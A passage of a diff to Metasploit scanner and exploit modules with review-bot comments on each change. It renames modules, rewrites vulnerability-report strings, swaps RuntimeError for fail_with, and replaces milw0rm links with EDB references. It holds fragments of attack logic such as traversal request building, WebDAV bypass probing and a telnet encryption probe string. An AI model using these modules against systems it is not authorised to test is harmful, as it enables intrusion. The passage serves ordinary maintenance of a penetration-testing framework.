else
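Review bot: The new `:info` value interpolates the whole captured `config` into the exploit record, which puts device secrets (password hashes, community strings, keys) into a field that is shown in listings and exported in reports. Keep `:info` to a short statement and store the configuration with `store_loot`, referencing the returned path, e.g. `:info => "Module #{self.fullname} successfully captured the configuration file (stored as loot: #{path})"`. Whether the module already stores the file as loot is not visible here, since the surrounding method lies outside the hunk.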
diff --git a/modules/auxiliary/scanner/http/frontpage_login.rb b/modules/auxiliary/scanner/http/frontpage_login.rb
index e83a8b8352..21d0dfb878 100644
--- a/modules/auxiliary/scanner/http/frontpage_login.rb
+++ b/modules/auxiliary/scanner/http/frontpage_login.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
- 'Name' => 'FrontPage Server Extensions Login Utility',
+ 'Name' => 'FrontPage Server Extensions Anonymous Login Scanner',
'Version' => '$Revision$',
'Description' => 'This module queries the FrontPage Server Extensions and determines whether anonymous access is allowed.',
'References' =>
@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
if datastore['RPORT'].to_i == 80 or datastore['RPORT'].to_i == 443
port = ""
else
- port = ":" + datastore['RPORT']
+ port = ":" + datastore['RPORT'].to_s
end
info = (datastore['SSL'] ? "https" : "http") + "://#{target_host}#{port}/"
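Review bot: The port is dropped from `info` whenever RPORT is 80 or 443 regardless of the scheme, so SSL on port 80 or plain HTTP on port 443 produces a URL that points at the wrong port. The `.to_s` fix stops the type error but keeps that logic. Comparing against the default for the chosen scheme fixes it: `port = (datastore['RPORT'].to_i == (datastore['SSL'] ? 443 : 80)) ? "" : ":#{datastore['RPORT']}"`. The method this belongs to begins outside the hunk.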
@@ -133,8 +133,8 @@ class Metasploit3 < Msf::Auxiliary
:host => target_host,
:port => rport,
:proto => 'tcp',
- :name => self.fullname,
- :info => "#{info} FrontPage ACCESS ALLOWED [#{retcode}]",
+ :name => self.name,
+ :info => "Module #{self.fullname} confirmed access to #{info} [#{retcode}]",
:refs => self.references,
:exploited_at => Time.now.utc
}
diff --git a/modules/auxiliary/scanner/http/http_put.rb b/modules/auxiliary/scanner/http/http_put.rb
index a683121fd8..9bbc8b123e 100644
--- a/modules/auxiliary/scanner/http/http_put.rb
+++ b/modules/auxiliary/scanner/http/http_put.rb
@@ -150,13 +150,14 @@ class Metasploit4 < Msf::Auxiliary
#Check file
if not res.nil? and file_exists(path, data)
- print_good("File uploaded: #{(ssl ? 'https' : 'http')}://#{ip}:#{rport}#{path}")
+ turl = "#{(ssl ? 'https' : 'http')}://#{ip}:#{rport}#{path}"
+ print_good("File uploaded: #{turl}")
report_vuln(
:host => ip,
:port => rport,
:proto => 'tcp',
- :name => self.fullname,
- :info => "PUT Enabled",
+ :name => self.name,
+ :info => "Module #{self.fullname} confirmed write access to #{turl} via PUT",
:refs => self.references,
:exploited_at => Time.now.utc
)
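Review bot: This `report_vuln` call has no `:sname`, while the DELETE branch in the next hunk passes `:sname => (ssl ? 'https' : 'http')`, so the two findings from one module are attached to differently described services. Add `:sname => (ssl ? 'https' : 'http'),` after `:proto => 'tcp',` here. The scheme expression now appears three times in this branch; computing it once before `turl` would keep the URL and the service name from drifting apart.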
@@ -182,14 +183,15 @@ class Metasploit4 < Msf::Auxiliary
if res.nil? or file_exists(path, data)
print_error("DELETE failed. File is still there.")
else
- print_good("File deleted: #{(ssl ? 'https' : 'http')}://#{ip}:#{rport}#{path}")
+ turl = "#{(ssl ? 'https' : 'http')}://#{ip}:#{rport}#{path}"
+ print_good("File deleted: #{turl}")
report_vuln(
:host => ip,
:port => rport,
:proto => 'tcp',
:sname => (ssl ? 'https' : 'http'),
- :name => self.fullname,
- :info => "DELETE ENABLED",
+ :name => self.name,
+ :info => "Module #{self.fullname} confirmed write access to #{turl} via DELETE",
:refs => self.references,
:exploited_at => Time.now.utc
)
diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb
index cda7a4cf4e..071b726463 100644
--- a/modules/auxiliary/scanner/http/http_traversal.rb
+++ b/modules/auxiliary/scanner/http/http_traversal.rb
@@ -100,8 +100,9 @@ class Metasploit3 < Msf::Auxiliary
1.upto(depth) do |d|
file_to_read.each do |f|
trigger = base * d
- req = ini_request(datastore['PATH'] + trigger + f)
- vprint_status("Trying: http://#{rhost}:#{rport}#{req['uri']}")
+ p = datastore['PATH'] + trigger + f
+ req = ini_request(p)
+ vprint_status("Trying: http://#{rhost}:#{rport}#{p}")
res = send_request_cgi(req, 25)
return trigger if res and res.to_s =~ datastore['PATTERN']
end
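Review bot: The new local `p` shadows `Kernel#p` inside the block, which makes later debugging statements in this loop behave unexpectedly. A descriptive name such as `trav_path = datastore['PATH'] + trigger + f` reads better. The status line also still prints `http://` unconditionally; if the module supports SSL (not visible in this hunk), the logged URL should use `ssl ? 'https' : 'http'`.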
@@ -137,8 +138,18 @@ class Metasploit3 < Msf::Auxiliary
when 'HEAD'
end
+ if not req['vars_get'].nil? or not req['vars_post'].nil? or not req['data'].nil?
+ begin
+ this_path = URI(uri).path
+ rescue ::URI::InvalidURIError
+ this_path = uri.scan(/^(.+)\?*.*/).flatten[0]
+ end
+ else
+ this_path = uri
+ end
+
req['method'] = datastore['METHOD']
- req['uri'] = uri
+ req['uri'] = this_path
req['headers'] = {'Cookie'=>datastore['COOKIE']} if not datastore['COOKIE'].empty?
req['data'] = datastore['DATA'] if not datastore['DATA'].empty?
req['basic_auth'] = datastore['BASICAUTH'] if not datastore['BASICAUTH'].empty?
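Review bot: The fallback in the `rescue ::URI::InvalidURIError` branch does not strip anything, because in `/^(.+)\?*.*/` the greedy `.+` consumes the whole line including any `?query`, so `this_path` ends up equal to `uri`. The `^` anchor also matches at each line start rather than at the start of the string. If the intent is to keep only the part before the query string, `this_path = uri[/\A[^?]*/]` does that without a capture group. A short comment saying why the path is reduced only when `vars_get`, `vars_post` or `data` is set would help, since the `case` that fills `req` starts outside the hunk.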
diff --git a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb
index f8afd7abc8..c19ab94da5 100644
--- a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb
+++ b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb
@@ -22,13 +22,12 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
- 'Name' => 'MS09-020 IIS6 WebDAV Unicode Auth Bypass',
+ 'Name' => 'MS09-020 IIS6 WebDAV Unicode Authentication Bypass',
'Description' => %q{
- Simplified version of MS09-020 IIS6 WebDAV Unicode Auth Bypass scanner. It attempts
- to bypass authentication using the WebDAV IIS6 Unicode vulnerability
- discovered by Kingcope. The vulnerability appears to be exploitable
- where WebDAV is enabled on the IIS6 server, and any protected folder
- requires either Basic, Digest or NTLM authentication.
+ This module attempts to to bypass authentication using the WebDAV IIS6
+ Unicode vulnerability discovered by Kingcope. The vulnerability appears
+ to be exploitable where WebDAV is enabled on the IIS6 server, and any
+ protected folder requires either Basic, Digest or NTLM authentication.
},
'Author' => [ 'et', 'patrick' ],
'Version' => '$Revision$',
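Review bot: The rewritten description contains a doubled word, "This module attempts to to bypass authentication", and this text is shown to users in the module info. It should read `This module attempts to bypass authentication using the WebDAV IIS6`.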
@@ -77,8 +76,8 @@ class Metasploit3 < Msf::Auxiliary
if(not res)
print_error("NO Response.")
elsif (res.code.to_i == 401)
- print_status("Confirmed protected folder #{wmap_base_url}#{tpath} #{res.code} (#{wmap_target_host})")
- print_status("\tTesting for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.")
+ print_status("#{rhost}:#{rport} Confirmed protected folder #{wmap_base_url}#{tpath} #{res.code} (#{wmap_target_host})")
+ print_status("#{rhost}:#{rport} \tTesting for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.")
cset = %W{ & ^ % $ # @ ! }
buff = ''
@@ -100,7 +99,7 @@ class Metasploit3 < Msf::Auxiliary
}, 20)
if (res.code.to_i == 207)
- print_status("\tFound vulnerable WebDAV Unicode bypass. #{wmap_base_url}#{tpath}#{bogus}/ #{res.code} (#{wmap_target_host})")
+ print_status("#{rhost}:#{rport} \tFound vulnerable WebDAV Unicode bypass. #{wmap_base_url}#{tpath}#{bogus}/ #{res.code} (#{wmap_target_host})")
report_vuln(
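Review bot: `res.code.to_i == 207` is evaluated without checking that `res` is non-nil, unlike the first response, which the previous hunk guards with `if(not res)`. If this second request times out and returns nil, the call raises NoMethodError, which the `rescue` clauses visible in the last hunk of this file do not list. Use `if (res and res.code.to_i == 207)`. The assignment of `res` for this request is outside the hunk, so this assumes it comes from the call that ends at `}, 20)`.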
@@ -108,8 +107,9 @@ class Metasploit3 < Msf::Auxiliary
:host => ip,
:port => rport,
:proto => 'tcp',
- :name => self.fullname,
- :info => "#{tpath}#{bogus} / Code: #{res.code}",
+ :sname => ssl ? 'https' : 'http',
+ :name => self.name,
+ :info => "Module #{self.fullname} bypassed authentication with #{tpath}#{bogus} (response code #{res.code})",
:refs => self.references,
:exploited_at => Time.now.utc
}
@@ -117,7 +117,7 @@ class Metasploit3 < Msf::Auxiliary
end
else
- print_error("Folder does not require authentication. [#{res.code}]")
+ print_error("#{rhost}:#{rport} Folder does not require authentication. [#{res.code}]")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::E877PIPE
diff --git a/modules/auxiliary/scanner/http/options.rb b/modules/auxiliary/scanner/http/options.rb
index a041d2488b..14587cb43a 100644
--- a/modules/auxiliary/scanner/http/options.rb
+++ b/modules/auxiliary/scanner/http/options.rb
@@ -67,8 +67,8 @@ class Metasploit3 < Msf::Auxiliary
:port => rport,
:proto => 'tcp',
:sname => (ssl ? 'https' : 'http'),
- :name => self.fullname,
- :info => res.headers['Allow'],
+ :name => "HTTP Trace Method Allowed",
+ :info => "Module #{self.fullname} detected TRACE access through the Allow header: #{res.headers['Allow']}",
:refs => self.references,
:exploited_at => Time.now.utc
)
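Review bot: The vulnerability name is now the hard-coded string `"HTTP Trace Method Allowed"`, where every other module in this commit switches to `:name => self.name`, so findings from this module will not group under the module's own title. The `:info` text also states TRACE was detected from the `Allow` header, which is only advertised by the server and is stored verbatim. If the condition guarding this call (outside the hunk) does not check for TRACE specifically, the record would be mislabelled. A comment above the call stating which condition makes this a TRACE finding would settle that.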
diff --git a/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb b/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb
index 50c3e76d23..24cc5c5cf0 100644
--- a/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb
+++ b/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb
@@ -17,7 +17,7 @@ class Metasploit4 < Msf::Auxiliary
def initialize
super(
- 'Name' => 'Reverse Proxy Bypass Scanner',
+ 'Name' => 'Apache Reverse Proxy Bypass Vulnerability Scanner',
'Version' => '$Revision$',
'Description' => %q{
Scan for poorly configured reverse proxy servers.
@@ -66,15 +66,15 @@ class Metasploit4 < Msf::Auxiliary
end
if response.nil?
- vprint_error "Request against #{host} timed out"
+ vprint_error "#{rhost}:#{rport} Request timed out"
return nil
end
seconds_transpired = (responded_at - requested_at).to_f
- vprint_status "#{host} took #{seconds_transpired} seconds to respond to URI #{uri}"
+ vprint_status "#{rhost}:#{rport} Server took #{seconds_transpired} seconds to respond to URI #{uri}"
status_code = response.code
- vprint_status "#{host} responded with status code #{status_code} to URI #{uri}"
+ vprint_status "#{rhost}:#{rport} Server responded with status code #{status_code} to URI #{uri}"
return {
:requested_at => requested_at,
@@ -92,7 +92,7 @@ class Metasploit4 < Msf::Auxiliary
end
if baseline[:status_code] == test_status_code
- vprint_error "The baseline status code for #{host} matches our test's"
+ vprint_error "#{rhost}:#{rport} The baseline status code for #{host} matches our test's"
return
end
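Review bot: The new message prints the target twice, `"#{rhost}:#{rport} The baseline status code for #{host} matches our test's"`, now that the prefix already identifies it. Dropping the inner reference gives `vprint_error "#{rhost}:#{rport} The baseline status code matches our test's"`. The next hunk likewise logs with `rhost` but reports with `:host => host`; using one of the two throughout avoids a log line and a database record that name different hosts if they ever differ.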
@@ -101,13 +101,14 @@ class Metasploit4 < Msf::Auxiliary
status_code = injection_info[:status_code]
if status_code == test_status_code
- print_good "#{host}:#{rport} is vulnerable!"
+ print_good "#{rhost}:#{rport} Server appears to be vulnerable!"
report_vuln(
:host => host,
:port => rport,
:proto => 'tcp',
- :name => self.fullname,
- :info => "Returned #{status_code} when requested #{uri}",
+ :sname => ssl ? 'https' : 'http',
+ :name => self.name,
+ :info => "Module #{self.fullname} obtained #{status_code} when requesting #{uri}",
:refs => self.references,
:exploited_at => injection_info[:requested_at]
)
diff --git a/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb b/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb
index 8493ee53ab..19a3c08d8d 100644
--- a/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb
+++ b/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb
@@ -21,9 +21,9 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
- 'Name' => 'VMware Server Directory Transversal Vulnerability',
+ 'Name' => 'VMware Server Directory Traversal Vulnerability',
'Version' => '$Revision$',
- 'Description' => 'This modules exploits the VMware Server Directory traversal
+ 'Description' => 'This modules exploits the VMware Server Directory Traversal
vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before
2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5
allows remote attackers to read arbitrary files. Common VMware server ports
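Review bot: The edited description line still begins "This modules exploits", and the sentence it starts does not parse ("exploits the ... vulnerability in VMware Server ... allows remote attackers to read arbitrary files"). Since the line is being touched anyway, it could read `This module exploits the VMware Server Directory Traversal` with the later clause changed to "which allows remote attackers to read arbitrary files". The rest of the description continues outside the hunk.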
@@ -68,8 +68,8 @@ class Metasploit3 < Msf::Auxiliary
:host => target_host,
:port => rport,
:proto => 'tcp',
- :name => self.fullname,
- :info => res.code,
+ :name => self.name,
+ :info => "Module #{self.fullname} reports directory traversal of #{target_host}:#{rport} with response code #{res.code}",
:refs => self.references,
:exploited_at => Time.now.utc
}
diff --git a/modules/auxiliary/scanner/misc/java_rmi_server.rb b/modules/auxiliary/scanner/misc/java_rmi_server.rb
index 4c23f6bf72..c5c7c0b936 100644
--- a/modules/auxiliary/scanner/misc/java_rmi_server.rb
+++ b/modules/auxiliary/scanner/misc/java_rmi_server.rb
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
- 'Name' => 'Java RMI Server Endpoint Scanner',
+ 'Name' => 'Java RMI Server Insecure Endpoint Code Execution Scanner',
'Version' => '$Revision$',
'Description' => 'Detect Java RMI endpoints',
'Author' => ['mihi', 'hdm'],
@@ -95,14 +95,12 @@ class Metasploit3 < Msf::Auxiliary
report_service(:host => rhost, :port => rport, :name => "java-rmi", :info => "Class Loader: Disabled")
elsif buf.length > 0
print_good("#{rhost}:#{rport} Java RMI Endpoint Detected: Class Loader Enabled")
- report_service(:host => rhost, :port => rport, :name => "java-rmi", :info => "Class Loader: Enabled")
+ svc = report_service(:host => rhost, :port => rport, :name => "java-rmi", :info => "Class Loader: Enabled")
report_vuln(
:host => rhost,
- :port => rport,
- :proto => 'tcp',
- :sname => (ssl ? 'https' : 'http'),
- :name => self.fullname,
- :info => "Class Loader: Enabled",
+ :service => svc,
+ :name => self.name,
+ :info => "Module #{self.fullname} confirmed remote code execution via this RMI service",
:refs => self.references
)
else
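Review bot: The new `:info` text says the module "confirmed remote code execution", but the branch shown only observes a non-empty reply and prints "Class Loader Enabled"; no code execution is demonstrated in the visible lines. Overstating the finding misleads whoever triages the report. Wording that matches the check would be `:info => "Module #{self.fullname} detected an RMI endpoint with the class loader enabled"`. The one-line `'Description' => 'Detect Java RMI endpoints'` in the previous hunk also no longer matches the new module name.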
diff --git a/modules/auxiliary/scanner/mysql/mysql_version.rb b/modules/auxiliary/scanner/mysql/mysql_version.rb
index 6a0b2e27e1..8ba017177e 100644
--- a/modules/auxiliary/scanner/mysql/mysql_version.rb
+++ b/modules/auxiliary/scanner/mysql/mysql_version.rb
@@ -44,6 +44,7 @@ class Metasploit3 < Msf::Auxiliary
return
end
rescue ::Rex::ConnectionError, ::EOFError
+ vprint_error("#{rhost}:#{rport} - Connection failed")
return
rescue ::Exception
print_error("Error: #{$!}")
diff --git a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb
index bf9f49d80c..d51ef25f64 100644
--- a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb
+++ b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb
@@ -50,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary
# This makes db_services look a lot nicer.
banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
- report_service(:host => rhost, :port => rport, :name => "telnet", :info => banner_sanitized)
+ svc = report_service(:host => rhost, :port => rport, :name => "telnet", :info => banner_sanitized)
# Check for encryption option ( IS(0) DES_CFB64(1) )
sock.put("\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0")
@@ -124,12 +124,11 @@ class Metasploit3 < Msf::Auxiliary
print_good("#{ip}:#{rport} VULNERABLE: #{banner_sanitized}")
report_vuln(
{
- :host => ip,
- :port => rport,
- :proto => 'tcp',
- :name => self.fullname,
- :info => banner_sanitized,
- :refs => self.references
+ :host => ip,
+ :service => svc,
+ :name => self.name,
+ :info => "Module #{self.fullname} confirmed acceptance of a long key ID: #{banner_sanitized}",
+ :refs => self.references
}
)
diff --git a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb
index d7a9166525..3de1c52f95 100644
--- a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb
+++ b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb
@@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
ver = "#{vnc.majver}.#{vnc.minver}"
print_status("#{target_host}:#{rport}, VNC server protocol version : #{ver}")
- report_service(
+ svc = report_service(
:host => rhost,
:port => rport,
:proto => 'tcp',
@@ -77,12 +77,11 @@ class Metasploit3 < Msf::Auxiliary
print_good("#{target_host}:#{rport}, VNC server security types includes None, free access!")
report_vuln(
{
- :host => rhost,
- :port => rport,
- :proto => 'tcp',
- :name => self.fullname,
- :info => sec_type.join(","),
- :refs => self.references,
+ :host => rhost,
+ :service => svc,
+ :name => self.name,
+ :info => "Module #{self.fullname} identified the VNC 'none' security type: #{sec_type.join(", ")}",
+ :refs => self.references,
:exploited_at => Time.now.utc
})
end
diff --git a/modules/auxiliary/server/capture/http.rb b/modules/auxiliary/server/capture/http.rb
index a6b55d4128..e261a8d128 100644
--- a/modules/auxiliary/server/capture/http.rb
+++ b/modules/auxiliary/server/capture/http.rb
@@ -134,7 +134,7 @@ class Metasploit3 < Msf::Auxiliary
when /rv:([\d\.]+)/
ua_name = 'FF'
ua_vers = $1
- when /Mozilla\/[0-9]\.[0-9] \(compatible; MSIE ([0-9]\.[0-9]+)/
+ when /Mozilla\/[0-9]\.[0-9] \(compatible; MSIE ([0-9]+\.[0-9]+)/
ua_name = 'IE'
ua_vers = $1
when /Version\/(\d+\.\d+\.\d+).*Safari/
diff --git a/modules/encoders/x86/alpha_mixed.rb b/modules/encoders/x86/alpha_mixed.rb
index 4af33dea5f..9cfb1947ca 100644
--- a/modules/encoders/x86/alpha_mixed.rb
+++ b/modules/encoders/x86/alpha_mixed.rb
@@ -66,7 +66,7 @@ class Metasploit3 < Msf::Encoder::Alphanum
# Configure SEH getpc code on Windows
#
def init_platform(platform)
- if(::Msf::Module::PlatformList.from_a(platform).supports?(::Msf::Module::PlatformList.win32))
+ if(platform.supports?(::Msf::Module::PlatformList.win32))
datastore['AllowWin32SEH'] = true
end
end
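Review bot: `init_platform` now calls `platform.supports?` directly, so it requires the argument to already be a platform list; an Array or nil, which the removed `PlatformList.from_a` conversion accepted, would raise NoMethodError. The callers are outside this hunk, so whether any still pass an array cannot be checked here. The header comment should record the new contract, for example `# platform must be a Msf::Module::PlatformList (no longer converted from an Array)`.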
diff --git a/modules/exploits/aix/rpc_cmsd_opcode21.rb b/modules/exploits/aix/rpc_cmsd_opcode21.rb
index 1cec6d4be0..a8fb6c4567 100644
--- a/modules/exploits/aix/rpc_cmsd_opcode21.rb
+++ b/modules/exploits/aix/rpc_cmsd_opcode21.rb
@@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote
begin
if (not sunrpc_create('udp', 100068, 4))
- raise RuntimeError, 'sunrpc_create failed'
+ fail_with(Exploit::Failure::Unknown, 'sunrpc_create failed')
end
# spray the heap a bit (work around powerpc cache issues)
diff --git a/modules/exploits/bsdi/softcart/mercantec_softcart.rb b/modules/exploits/bsdi/softcart/mercantec_softcart.rb
index e8c20766ec..085b11fe93 100644
--- a/modules/exploits/bsdi/softcart/mercantec_softcart.rb
+++ b/modules/exploits/bsdi/softcart/mercantec_softcart.rb
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => datastore['URI']
}, 5)
@mercantec = (res and res.body and res.body =~ /Copyright.*Mercantec/)
- raise RuntimeError, "The target is not a Mercantec CGI" if not @mercantec
+ fail_with(Exploit::Failure::NotFound, "The target is not a Mercantec CGI") if not @mercantec
end
buffer =
diff --git a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb
index 107a1c26be..00ab7533ca 100644
--- a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb
+++ b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb
@@ -153,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("FTP Banner: #{banner.strip}")
version = m[1]
else
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
regexp = Regexp.escape(version)
@@ -165,14 +165,14 @@ class Metasploit3 < Msf::Exploit::Remote
end
if (not @mytarget)
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
print_status("Selected Target: #{@mytarget.name}")
pl = exploit_regenerate_payload(@mytarget.platform, arch)
if not pl
- raise RuntimeError, 'Unable to regenerate payload!'
+ fail_with(Exploit::Failure::Unknown, 'Unable to regenerate payload!')
end
else
print_status("Trying target #{@mytarget.name}...")
diff --git a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
index 42e6a06a62..1cdb253478 100644
--- a/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
+++ b/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
@@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
loop do
data = sock.get_once(-1, 5) rescue nil
if not data
- raise RuntimeError, "This system does not support encryption"
+ fail_with(Exploit::Failure::Unknown, "This system does not support encryption")
end
break if data.index("\xff\xfa\x26\x02\x01")
end
diff --git a/modules/exploits/linux/ftp/proftp_sreplace.rb b/modules/exploits/linux/ftp/proftp_sreplace.rb
index 57646a8162..56615ba85b 100644
--- a/modules/exploits/linux/ftp/proftp_sreplace.rb
+++ b/modules/exploits/linux/ftp/proftp_sreplace.rb
@@ -170,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("FTP Banner: #{banner.strip}")
version = m[1]
else
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
regexp = Regexp.escape(version)
@@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if (not mytarget)
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
print_status("Selected Target: #{mytarget.name}")
@@ -198,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
pwd = send_cmd(['PWD'])
if pwd !~ /257\s\"(.+)\"/
- raise RuntimeError, "Unable to get current working directory"
+ fail_with(Exploit::Failure::Unknown, "Unable to get current working directory")
end
pwd = $1
pwd << "/" if pwd[-1,1] != "/"
diff --git a/modules/exploits/linux/ftp/proftp_telnet_iac.rb b/modules/exploits/linux/ftp/proftp_telnet_iac.rb
index 4a66140e0c..6704b33697 100644
--- a/modules/exploits/linux/ftp/proftp_telnet_iac.rb
+++ b/modules/exploits/linux/ftp/proftp_telnet_iac.rb
@@ -330,7 +330,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("FTP Banner: #{banner.strip}")
version = m[1]
else
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
regexp = Regexp.escape(version)
@@ -342,7 +342,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if (not mytarget)
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
print_status("Selected Target: #{mytarget.name}")
@@ -388,7 +388,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Make sure we didn't introduce instability
addr_badchars = "\x09\x0a\x0b\x0c\x20"
if idx = Rex::Text.badchar_index(addrs, addr_badchars)
- raise RuntimeError, ("One or more address contains a bad character! (0x%02x @ 0x%x)" % [addrs[idx,1].unpack('C').first, idx])
+ fail_with(Exploit::Failure::Unknown, ("One or more address contains a bad character! (0x%02x @ 0x%x)" % [addrs[idx,1].unpack('C').first, idx]))
end
buf << addrs
@@ -437,7 +437,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if not session_created?
- raise RuntimeError, "Unable to guess the cookie value, sorry :-/"
+ fail_with(Exploit::Failure::Unknown, "Unable to guess the cookie value, sorry :-/")
end
else
sock.put(buf)
diff --git a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb
index 98b35ff2f7..ca5136397e 100644
--- a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb
+++ b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2009-2765' ],
[ 'OSVDB', '55990' ],
[ 'BID', '35742' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/9209' ]
+ [ 'EDB', '9209' ]
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
diff --git a/modules/exploits/linux/imap/imap_uw_lsub.rb b/modules/exploits/linux/imap/imap_uw_lsub.rb
index 553f7ecfa1..fe683d76fb 100644
--- a/modules/exploits/linux/imap/imap_uw_lsub.rb
+++ b/modules/exploits/linux/imap/imap_uw_lsub.rb
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2000-0284' ],
[ 'OSVDB', '12037' ],
[ 'BID', '1110' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/284' ],
+ [ 'EDB', '284' ]
],
'Privileged' => false,
'Payload' =>
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Trying 0x%.8x ..." % addresses['Ret'])
if (not connect_login)
- raise RuntimeError, "Unable to log in!"
+ fail_with(Exploit::Failure::Unknown, "Unable to log in!")
end
req = "a002 LSUB \"\" {%d}\r\n" % target['Offset']
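Review bot: A failed `connect_login` is reported as `Exploit::Failure::Unknown`, which throws away the one thing the code does know, that authentication was refused. `fail_with(Exploit::Failure::NoAccess, "Unable to log in!")` classifies it so that failure reasons can be filtered afterwards. The same applies to the `'Unable to authenticate'` change in the first hunk of wuftpd_site_exec_format.rb.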
diff --git a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb b/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb
index 6518670f72..c2b40605ef 100644
--- a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb
+++ b/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb
@@ -349,7 +349,7 @@ EOS
#puts value[-10..-1].unpack('C*').map { |i| i.to_s 16 }.join(',')
if (len == 24 and value.length != 198)
- raise "Value is too big! #{value.length}"
+ fail_with(Exploit::Failure::BadConfig, "Value is too big! #{value.length}")
end
buf = "\xdd" + value.length.chr + value
diff --git a/modules/exploits/linux/misc/gld_postfix.rb b/modules/exploits/linux/misc/gld_postfix.rb
index 509e4458b0..d03c95e781 100644
--- a/modules/exploits/linux/misc/gld_postfix.rb
+++ b/modules/exploits/linux/misc/gld_postfix.rb
@@ -35,7 +35,7 @@ require 'msf/core'
[ 'CVE', '2005-1099' ],
[ 'OSVDB', '15492' ],
[ 'BID', '13129' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/934' ],
+ [ 'EDB', '934' ]
],
'Privileged' => true,
'License' => MSF_LICENSE,
diff --git a/modules/exploits/linux/mysql/mysql_yassl_getname.rb b/modules/exploits/linux/mysql/mysql_yassl_getname.rb
index 0115b6833c..fcd1b00bf4 100644
--- a/modules/exploits/linux/mysql/mysql_yassl_getname.rb
+++ b/modules/exploits/linux/mysql/mysql_yassl_getname.rb
@@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
if (buf = sock.get_once(-1, 5) || '')
#print_status("\n" + Rex::Text.to_hex_dump(buf))
if (buf =~ /is not allowed to connect/)
- raise RuntimeError, 'The server refused our connection!'
+ fail_with(Exploit::Failure::Unreachable, 'The server refused our connection!')
end
len1,cmd = buf[0,5].unpack('VC')
@@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
if (not mytarget)
- raise RuntimeError, 'Unable to detect target automatically'
+ fail_with(Exploit::Failure::NoTarget, 'Unable to detect target automatically')
else
